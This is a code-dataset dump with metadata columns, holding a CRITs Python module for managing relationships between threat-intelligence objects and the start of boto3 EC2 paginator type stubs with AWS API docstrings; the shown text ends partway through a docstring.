hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
dcf63677b003deaf4111b24fab378a43fe257043
| 22,281
|
py
|
Python
|
crits/relationships/handlers.py
|
thelandy/crits
|
e8d72d8e3cb278d6e86215ba2bb567a874c66edd
|
[
"MIT"
] | null | null | null |
crits/relationships/handlers.py
|
thelandy/crits
|
e8d72d8e3cb278d6e86215ba2bb567a874c66edd
|
[
"MIT"
] | null | null | null |
crits/relationships/handlers.py
|
thelandy/crits
|
e8d72d8e3cb278d6e86215ba2bb567a874c66edd
|
[
"MIT"
] | null | null | null |
import datetime
from dateutil.parser import parse
from crits.core.class_mapper import class_from_id
def get_relationships(obj=None, type_=None, id_=None, analyst=None):
"""
Get relationships for a top-level object.
:param obj: The top-level object to get relationships for.
:type obj: :class:`crits.core.crits_mongoengine.CritsBaseAttributes`
:param type_: The top-level object type to get relationships for.
:type type_: str
:param id_: The ObjectId of the top-level object.
:type id_: str
:param analyst: The user requesting the relationships.
:type analyst: str
:returns: dict
"""
if obj:
return obj.sort_relationships("%s" % analyst, meta=True)
elif type_ and id_:
obj = class_from_id(type_, id_)
if not obj:
return {}
return obj.sort_relationships("%s" % analyst, meta=True)
else:
return {}
def get_relationship_types(active=True):
"""
Get relationship types available in the database.
:param active: Only get active relationship types.
:type active: bool
:returns: list
"""
from crits.core.crits_mongoengine import RelationshipType
if active:
result = RelationshipType.objects(active="on")
else:
result = RelationshipType.objects()
relationship_types = []
for r in result:
if r.forward != r.reverse:
relationship_types.append(r.forward)
relationship_types.append(r.reverse)
else:
relationship_types.append(r.forward)
relationship_types.sort()
return relationship_types
def forge_relationship(left_class=None, right_class=None,
left_type=None, left_id=None,
right_type=None, right_id=None,
rel_type=None, rel_date=None,
analyst=None, rel_reason="N/A",
rel_confidence='unknown', get_rels=False):
"""
Forge a relationship between two top-level objects.
:param left_class: The first top-level object to relate to.
:type left_class: :class:`crits.core.crits_mongoengine.CritsBaseAttributes`
:param right_class: The second top-level object to relate to.
:type right_class: :class:`crits.core.crits_mongoengine.CritsBaseAttributes`
:param left_type: The type of first top-level object to relate to.
:type left_type: str
:param left_id: The ObjectId of the first top-level object.
:type left_id: str
:param right_type: The type of second top-level object to relate to.
:type right_type: str
:param right_id: The ObjectId of the second top-level object.
:type right_id: str
:param rel_type: The type of relationship.
:type rel_type: str
:param rel_date: The date this relationship applies.
:type rel_date: datetime.datetime
:param analyst: The user forging this relationship.
:type analyst: str
:param rel_reason: The reason for the relationship.
:type rel_reason: str
:param rel_confidence: The confidence of the relationship.
:type rel_confidence: str
:param get_rels: Return the relationships after forging.
:type get_rels: boolean
:returns: dict with keys "success" (boolean) and "message" (str if
failed, dict if successful)
"""
if rel_date is None or rel_date == 'None':
rel_date = None
elif isinstance(rel_date, basestring) and rel_date != '':
rel_date = parse(rel_date, fuzzy=True)
elif not isinstance(rel_date, datetime.datetime):
rel_date = None
if not left_class:
if left_type and left_id:
left_class = class_from_id(left_type, left_id)
if not left_class:
return {'success': False,
'message': "Unable to get object."}
else:
return {'success': False,
'message': "Need a valid left type and id"}
try:
# forge relationship
if right_class:
results = left_class.add_relationship(rel_item=right_class,
rel_type=rel_type,
rel_date=rel_date,
analyst=analyst,
rel_confidence=rel_confidence,
rel_reason=rel_reason)
right_class.save(username=analyst)
else:
if right_type and right_id:
results = left_class.add_relationship(type_=right_type,
rel_id=right_id,
rel_type=rel_type,
rel_date=rel_date,
analyst=analyst,
rel_confidence=rel_confidence,
rel_reason=rel_reason)
else:
return {'success': False,
'message': "Need a valid right type and id"}
except Exception, e:
return {'success': False, 'message': e}
if results['success']:
left_class.save(username=analyst)
left_class.reload()
if get_rels:
results['relationships'] = left_class.sort_relationships("%s" % analyst, meta=True)
return results
def delete_all_relationships(left_class=None, left_type=None,
left_id=None, analyst=None):
"""
Delete all relationships for this top-level object.
:param left_class: The top-level object to delete relationships for.
:type left_class: :class:`crits.core.crits_mongoengine.CritsBaseAttributes`
:param left_type: The type of the top-level object.
:type left_type: str
:param left_id: The ObjectId of the top-level object.
:type left_id: str
:param analyst: The user deleting these relationships.
:type analyst: str
:returns: dict with keys "success" (boolean) and "message" (str)
"""
if not left_class:
if left_type and left_id:
left_class = class_from_id(left_type, left_id)
if not left_class:
return {'success': False,
'message': "Unable to get object."}
else:
return {'success': False,
'message': "Need a valid left type and id"}
return left_class.delete_all_relationships()
def delete_relationship(left_class=None, right_class=None,
left_type=None, left_id=None,
right_type=None, right_id=None,
rel_type=None, rel_date=None,
analyst=None, get_rels=True):
"""
Delete a relationship between two top-level objects.
:param left_class: The first top-level object.
:type left_class: :class:`crits.core.crits_mongoengine.CritsBaseAttributes`
:param right_class: The second top-level object.
:type right_class: :class:`crits.core.crits_mongoengine.CritsBaseAttributes`
:param left_type: The type of first top-level object.
:type left_type: str
:param left_id: The ObjectId of the first top-level object.
:type left_id: str
:param right_type: The type of second top-level object.
:type right_type: str
:param right_id: The ObjectId of the second top-level object.
:type right_id: str
:param rel_type: The type of relationship.
:type rel_type: str
:param rel_date: The date this relationship applies.
:type rel_date: datetime.datetime
:param analyst: The user deleting this relationship.
:type analyst: str
:param get_rels: Return the relationships after forging.
:type get_rels: boolean
:returns: dict with keys "success" (boolean) and "message" (str if
failed, dict if successful)
"""
if rel_date is None or rel_date == 'None':
rel_date = None
elif isinstance(rel_date, basestring) and rel_date != '':
rel_date = parse(rel_date, fuzzy=True)
elif not isinstance(rel_date, datetime.datetime):
rel_date = None
if not left_class:
if left_type and left_id:
left_class = class_from_id(left_type, left_id)
if not left_class:
return {'success': False,
'message': "Unable to get object."}
else:
return {'success': False,
'message': "Need a valid left type and id"}
# delete relationship
if right_class:
results = left_class.delete_relationship(rel_item=right_class,
rel_type=rel_type,
rel_date=rel_date,
analyst=analyst)
right_class.save(username=analyst)
else:
if right_type and right_id:
results = left_class.delete_relationship(type_=right_type,
rel_id=right_id,
rel_type=rel_type,
rel_date=rel_date,
analyst=analyst)
else:
return {'success': False,
'message': "Need a valid right type and id"}
if results['success']:
left_class.save(username=analyst)
if get_rels:
results['relationships'] = left_class.sort_relationships("%s" % analyst, meta=True)
return results
def update_relationship_types(left_class=None, right_class=None,
left_type=None, left_id=None,
right_type=None, right_id=None,
rel_type=None, rel_date=None,
new_type=None,analyst=None):
"""
Update the relationship type between two top-level objects.
:param left_class: The first top-level object.
:type left_class: :class:`crits.core.crits_mongoengine.CritsBaseAttributes`
:param right_class: The second top-level object.
:type right_class: :class:`crits.core.crits_mongoengine.CritsBaseAttributes`
:param left_type: The type of first top-level object.
:type left_type: str
:param left_id: The ObjectId of the first top-level object.
:type left_id: str
:param right_type: The type of second top-level object.
:type right_type: str
:param right_id: The ObjectId of the second top-level object.
:type right_id: str
:param rel_type: The type of relationship.
:type rel_type: str
:param rel_date: The date this relationship applies.
:type rel_date: datetime.datetime
:param new_type: The new type of relationship.
:type new_type: str
:param analyst: The user updating this relationship.
:type analyst: str
:returns: dict with keys "success" (boolean) and "message" (str)
"""
if rel_date is None or rel_date == 'None':
rel_date = None
elif isinstance(rel_date, basestring) and rel_date != '':
rel_date = parse(rel_date, fuzzy=True)
elif not isinstance(rel_date, datetime.datetime):
rel_date = None
if not left_class:
if left_type and left_id:
left_class = class_from_id(left_type, left_id)
if not left_class:
return {'success': False,
'message': "Unable to get object."}
else:
return {'success': False,
'message': "Need a valid left type and id"}
# update relationship
if right_class:
results = left_class.edit_relationship_type(rel_item=right_class,
rel_type=rel_type,
rel_date=rel_date,
new_type=new_type,
analyst=analyst)
left_class.save(username=analyst)
right_class.save(username=analyst)
else:
if right_type and right_id:
results = left_class.edit_relationship_type(type_=right_type,
rel_id=right_id,
rel_type=rel_type,
rel_date=rel_date,
new_type=new_type,
analyst=analyst)
left_class.save(username=analyst)
else:
return {'success': False,
'message': "Need a valid right type and id"}
return results
def update_relationship_confidences(left_class=None, right_class=None,
left_type=None, left_id=None,
right_type=None, right_id=None,
rel_type=None, rel_date=None,
new_type=None,analyst=None,
new_confidence='unknown'):
"""
Update the relationship type between two top-level objects.
:param left_class: The first top-level object.
:type left_class: :class:`crits.core.crits_mongoengine.CritsBaseAttributes`
:param right_class: The second top-level object.
:type right_class: :class:`crits.core.crits_mongoengine.CritsBaseAttributes`
:param left_type: The type of first top-level object.
:type left_type: str
:param left_id: The ObjectId of the first top-level object.
:type left_id: str
:param right_type: The type of second top-level object.
:type right_type: str
:param right_id: The ObjectId of the second top-level object.
:type right_id: str
:param rel_type: The type of relationship.
:type rel_type: str
:param rel_date: The date this relationship applies.
:type rel_date: datetime.datetime
:param analyst: The user updating this relationship.
:type analyst: str
:param new_confidence: The new confidence level.
:type new_confidence: str
:returns: dict with keys "success" (boolean) and "message" (str)
"""
if rel_date is None or rel_date == 'None':
rel_date = None
elif isinstance(rel_date, basestring) and rel_date != '':
rel_date = parse(rel_date, fuzzy=True)
elif not isinstance(rel_date, datetime.datetime):
rel_date = None
if not left_class:
if left_type and left_id:
left_class = class_from_id(left_type, left_id)
else:
return {'success': False,
'message': "Need a valid left type and id"}
# update relationship
if right_class:
results = left_class.edit_relationship_confidence(rel_item=right_class,
rel_type=rel_type,
rel_date=rel_date,
new_confidence=new_confidence,
analyst=analyst)
left_class.save(username=analyst)
right_class.save(username=analyst)
else:
if right_type and right_id:
results = left_class.edit_relationship_confidence(type_=right_type,
rel_id=right_id,
rel_type=rel_type,
rel_date=rel_date,
new_confidence=new_confidence,
analyst=analyst)
left_class.save(username=analyst)
else:
return {'success': False,
'message': "Need a valid right type and id"}
return results
def update_relationship_reasons(left_class=None, right_class=None,
left_type=None, left_id=None,
right_type=None, right_id=None,
rel_type=None, rel_date=None,
new_type=None,analyst=None, new_reason="N/A"):
"""
Update the relationship type between two top-level objects.
:param left_class: The first top-level object.
:type left_class: :class:`crits.core.crits_mongoengine.CritsBaseAttributes`
:param right_class: The second top-level object.
:type right_class: :class:`crits.core.crits_mongoengine.CritsBaseAttributes`
:param left_type: The type of first top-level object.
:type left_type: str
:param left_id: The ObjectId of the first top-level object.
:type left_id: str
:param right_type: The type of second top-level object.
:type right_type: str
:param right_id: The ObjectId of the second top-level object.
:type right_id: str
:param rel_type: The type of relationship.
:type rel_type: str
:param rel_date: The date this relationship applies.
:type rel_date: datetime.datetime
:param analyst: The user updating this relationship.
:type analyst: str
:returns: dict with keys "success" (boolean) and "message" (str)
"""
if rel_date is None or rel_date == 'None':
rel_date = None
elif isinstance(rel_date, basestring) and rel_date != '':
rel_date = parse(rel_date, fuzzy=True)
elif not isinstance(rel_date, datetime.datetime):
rel_date = None
if not left_class:
if left_type and left_id:
left_class = class_from_id(left_type, left_id)
else:
return {'success': False,
'message': "Need a valid left type and id"}
# update relationship
if right_class:
results = left_class.edit_relationship_reason(rel_item=right_class,
rel_type=rel_type,
rel_date=rel_date,
new_reason=new_reason,
analyst=analyst)
left_class.save(username=analyst)
right_class.save(username=analyst)
else:
if right_type and right_id:
results = left_class.edit_relationship_reason(type_=right_type,
rel_id=right_id,
rel_type=rel_type,
rel_date=rel_date,
new_reason=new_reason,
analyst=analyst)
left_class.save(username=analyst)
else:
return {'success': False,
'message': "Need a valid right type and id"}
return results
def update_relationship_dates(left_class=None, right_class=None,
left_type=None, left_id=None,
right_type=None, right_id=None,
rel_type=None, rel_date=None,
new_date=None,analyst=None):
"""
Update the relationship date between two top-level objects.
:param left_class: The first top-level object.
:type left_class: :class:`crits.core.crits_mongoengine.CritsBaseAttributes`
:param right_class: The second top-level object.
:type right_class: :class:`crits.core.crits_mongoengine.CritsBaseAttributes`
:param left_type: The type of first top-level object.
:type left_type: str
:param left_id: The ObjectId of the first top-level object.
:type left_id: str
:param right_type: The type of second top-level object.
:type right_type: str
:param right_id: The ObjectId of the second top-level object.
:type right_id: str
:param rel_type: The type of relationship.
:type rel_type: str
:param rel_date: The date this relationship applies.
:type rel_date: datetime.datetime
:param new_date: The new date of the relationship.
:type new_date: str
:param analyst: The user updating this relationship.
:type analyst: str
:returns: dict with keys "success" (boolean) and "message" (str)
"""
if rel_date is None or rel_date == 'None':
rel_date = None
elif isinstance(rel_date, basestring) and rel_date != '':
rel_date = parse(rel_date, fuzzy=True)
elif not isinstance(rel_date, datetime.datetime):
rel_date = None
if new_date is None or new_date == 'None':
new_date = None
elif isinstance(new_date, basestring) and new_date != '':
new_date = parse(new_date, fuzzy=True)
elif not isinstance(new_date, datetime.datetime):
new_date = None
if not left_class:
if left_type and left_id:
left_class = class_from_id(left_type, left_id)
if not left_class:
return {'success': False,
'message': "Unable to get object."}
else:
return {'success': False,
'message': "Need a valid left type and id"}
# update relationship
if right_class:
results = left_class.edit_relationship_date(rel_item=right_class,
rel_type=rel_type,
rel_date=rel_date,
new_date=new_date,
analyst=analyst)
left_class.save(username=analyst)
right_class.save(username=analyst)
else:
if right_type and right_id:
results = left_class.edit_relationship_date(type_=right_type,
rel_id=right_id,
rel_type=rel_type,
rel_date=rel_date,
new_date=new_date,
analyst=analyst)
left_class.save(username=analyst)
else:
return {'success': False,
'message': "Need a valid right type and id"}
return results
| 42.278937
| 95
| 0.572865
| 2,592
| 22,281
| 4.716821
| 0.045525
| 0.054965
| 0.050384
| 0.053002
| 0.889007
| 0.874121
| 0.852037
| 0.832979
| 0.81523
| 0.807541
| 0
| 0
| 0.35344
| 22,281
| 526
| 96
| 42.359316
| 0.848674
| 0.005296
| 0
| 0.810811
| 0
| 0
| 0.059706
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.013514
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b4b6dd092135c289630c3d796f50721caba20dfd
| 652,967
|
py
|
Python
|
boto3_type_annotations_with_docs/boto3_type_annotations/ec2/paginator.py
|
cowboygneox/boto3_type_annotations
|
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
|
[
"MIT"
] | 119
|
2018-12-01T18:20:57.000Z
|
2022-02-02T10:31:29.000Z
|
boto3_type_annotations_with_docs/boto3_type_annotations/ec2/paginator.py
|
cowboygneox/boto3_type_annotations
|
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
|
[
"MIT"
] | 15
|
2018-11-16T00:16:44.000Z
|
2021-11-13T03:44:18.000Z
|
boto3_type_annotations_with_docs/boto3_type_annotations/ec2/paginator.py
|
cowboygneox/boto3_type_annotations
|
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
|
[
"MIT"
] | 11
|
2019-05-06T05:26:51.000Z
|
2021-09-28T15:27:59.000Z
|
from typing import Dict
from datetime import datetime
from typing import List
from botocore.paginate import Paginator
class DescribeByoipCidrs(Paginator):
def paginate(self, DryRun: bool = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_byoip_cidrs`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeByoipCidrs>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
DryRun=True|False,
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'ByoipCidrs': [
{
'Cidr': 'string',
'Description': 'string',
'StatusMessage': 'string',
'State': 'advertised'|'deprovisioned'|'failed-deprovision'|'failed-provision'|'pending-deprovision'|'pending-provision'|'provisioned'
},
],
}
**Response Structure**
- *(dict) --*
- **ByoipCidrs** *(list) --*
Information about your address ranges.
- *(dict) --*
Information about an address range that is provisioned for use with your AWS resources through bring your own IP addresses (BYOIP).
- **Cidr** *(string) --*
The public IPv4 address range, in CIDR notation.
- **Description** *(string) --*
The description of the address range.
- **StatusMessage** *(string) --*
Upon success, contains the ID of the address pool. Otherwise, contains an error message.
- **State** *(string) --*
The state of the address pool.
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeCapacityReservations(Paginator):
def paginate(self, CapacityReservationIds: List = None, Filters: List = None, DryRun: bool = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_capacity_reservations`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeCapacityReservations>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
CapacityReservationIds=[
'string',
],
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
DryRun=True|False,
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'CapacityReservations': [
{
'CapacityReservationId': 'string',
'InstanceType': 'string',
'InstancePlatform': 'Linux/UNIX'|'Red Hat Enterprise Linux'|'SUSE Linux'|'Windows'|'Windows with SQL Server'|'Windows with SQL Server Enterprise'|'Windows with SQL Server Standard'|'Windows with SQL Server Web'|'Linux with SQL Server Standard'|'Linux with SQL Server Web'|'Linux with SQL Server Enterprise',
'AvailabilityZone': 'string',
'Tenancy': 'default'|'dedicated',
'TotalInstanceCount': 123,
'AvailableInstanceCount': 123,
'EbsOptimized': True|False,
'EphemeralStorage': True|False,
'State': 'active'|'expired'|'cancelled'|'pending'|'failed',
'EndDate': datetime(2015, 1, 1),
'EndDateType': 'unlimited'|'limited',
'InstanceMatchCriteria': 'open'|'targeted',
'CreateDate': datetime(2015, 1, 1),
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
]
},
]
}
**Response Structure**
- *(dict) --*
- **CapacityReservations** *(list) --*
Information about the Capacity Reservations.
- *(dict) --*
Describes a Capacity Reservation.
- **CapacityReservationId** *(string) --*
The ID of the Capacity Reservation.
- **InstanceType** *(string) --*
The type of instance for which the Capacity Reservation reserves capacity.
- **InstancePlatform** *(string) --*
The type of operating system for which the Capacity Reservation reserves capacity.
- **AvailabilityZone** *(string) --*
The Availability Zone in which the capacity is reserved.
- **Tenancy** *(string) --*
Indicates the tenancy of the Capacity Reservation. A Capacity Reservation can have one of the following tenancy settings:
* ``default`` - The Capacity Reservation is created on hardware that is shared with other AWS accounts.
* ``dedicated`` - The Capacity Reservation is created on single-tenant hardware that is dedicated to a single AWS account.
- **TotalInstanceCount** *(integer) --*
The number of instances for which the Capacity Reservation reserves capacity.
- **AvailableInstanceCount** *(integer) --*
The remaining capacity. Indicates the number of instances that can be launched in the Capacity Reservation.
- **EbsOptimized** *(boolean) --*
Indicates whether the Capacity Reservation supports EBS-optimized instances. This optimization provides dedicated throughput to Amazon EBS and an optimized configuration stack to provide optimal I/O performance. This optimization isn't available with all instance types. Additional usage charges apply when using an EBS- optimized instance.
- **EphemeralStorage** *(boolean) --*
Indicates whether the Capacity Reservation supports instances with temporary, block-level storage.
- **State** *(string) --*
The current state of the Capacity Reservation. A Capacity Reservation can be in one of the following states:
* ``active`` - The Capacity Reservation is active and the capacity is available for your use.
* ``cancelled`` - The Capacity Reservation expired automatically at the date and time specified in your request. The reserved capacity is no longer available for your use.
* ``expired`` - The Capacity Reservation was manually cancelled. The reserved capacity is no longer available for your use.
* ``pending`` - The Capacity Reservation request was successful but the capacity provisioning is still pending.
* ``failed`` - The Capacity Reservation request has failed. A request might fail due to invalid request parameters, capacity constraints, or instance limit constraints. Failed requests are retained for 60 minutes.
- **EndDate** *(datetime) --*
The date and time at which the Capacity Reservation expires. When a Capacity Reservation expires, the reserved capacity is released and you can no longer launch instances into it. The Capacity Reservation's state changes to ``expired`` when it reaches its end date and time.
- **EndDateType** *(string) --*
Indicates the way in which the Capacity Reservation ends. A Capacity Reservation can have one of the following end types:
* ``unlimited`` - The Capacity Reservation remains active until you explicitly cancel it.
* ``limited`` - The Capacity Reservation expires automatically at a specified date and time.
- **InstanceMatchCriteria** *(string) --*
Indicates the type of instance launches that the Capacity Reservation accepts. The options include:
* ``open`` - The Capacity Reservation accepts all instances that have matching attributes (instance type, platform, and Availability Zone). Instances that have matching attributes launch into the Capacity Reservation automatically without specifying any additional parameters.
* ``targeted`` - The Capacity Reservation only accepts instances that have matching attributes (instance type, platform, and Availability Zone), and explicitly target the Capacity Reservation. This ensures that only permitted instances can use the reserved capacity.
- **CreateDate** *(datetime) --*
The date and time at which the Capacity Reservation was created.
- **Tags** *(list) --*
Any tags assigned to the Capacity Reservation.
- *(dict) --*
Describes a tag.
- **Key** *(string) --*
The key of the tag.
Constraints: Tag keys are case-sensitive and accept a maximum of 127 Unicode characters. May not begin with ``aws:`` .
- **Value** *(string) --*
The value of the tag.
Constraints: Tag values are case-sensitive and accept a maximum of 255 Unicode characters.
:type CapacityReservationIds: list
:param CapacityReservationIds:
The ID of the Capacity Reservation.
- *(string) --*
:type Filters: list
:param Filters:
One or more filters.
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeClassicLinkInstances(Paginator):
def paginate(self, Filters: List = None, DryRun: bool = None, InstanceIds: List = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_classic_link_instances`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeClassicLinkInstances>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
DryRun=True|False,
InstanceIds=[
'string',
],
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'Instances': [
{
'Groups': [
{
'GroupName': 'string',
'GroupId': 'string'
},
],
'InstanceId': 'string',
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
],
'VpcId': 'string'
},
],
}
**Response Structure**
- *(dict) --*
- **Instances** *(list) --*
Information about one or more linked EC2-Classic instances.
- *(dict) --*
Describes a linked EC2-Classic instance.
- **Groups** *(list) --*
A list of security groups.
- *(dict) --*
Describes a security group.
- **GroupName** *(string) --*
The name of the security group.
- **GroupId** *(string) --*
The ID of the security group.
- **InstanceId** *(string) --*
The ID of the instance.
- **Tags** *(list) --*
Any tags assigned to the instance.
- *(dict) --*
Describes a tag.
- **Key** *(string) --*
The key of the tag.
Constraints: Tag keys are case-sensitive and accept a maximum of 127 Unicode characters. May not begin with ``aws:`` .
- **Value** *(string) --*
The value of the tag.
Constraints: Tag values are case-sensitive and accept a maximum of 255 Unicode characters.
- **VpcId** *(string) --*
The ID of the VPC.
:type Filters: list
:param Filters:
One or more filters.
* ``group-id`` - The ID of a VPC security group that\'s associated with the instance.
* ``instance-id`` - The ID of the instance.
* ``tag`` :<key> - The key/value combination of a tag assigned to the resource. Use the tag key in the filter name and the tag value as the filter value. For example, to find all resources that have a tag with the key ``Owner`` and the value ``TeamA`` , specify ``tag:Owner`` for the filter name and ``TeamA`` for the filter value.
* ``tag-key`` - The key of a tag assigned to the resource. Use this filter to find all resources assigned a tag with a specific key, regardless of the tag value.
* ``vpc-id`` - The ID of the VPC to which the instance is linked. ``vpc-id`` - The ID of the VPC that the instance is linked to.
- *(dict) --*
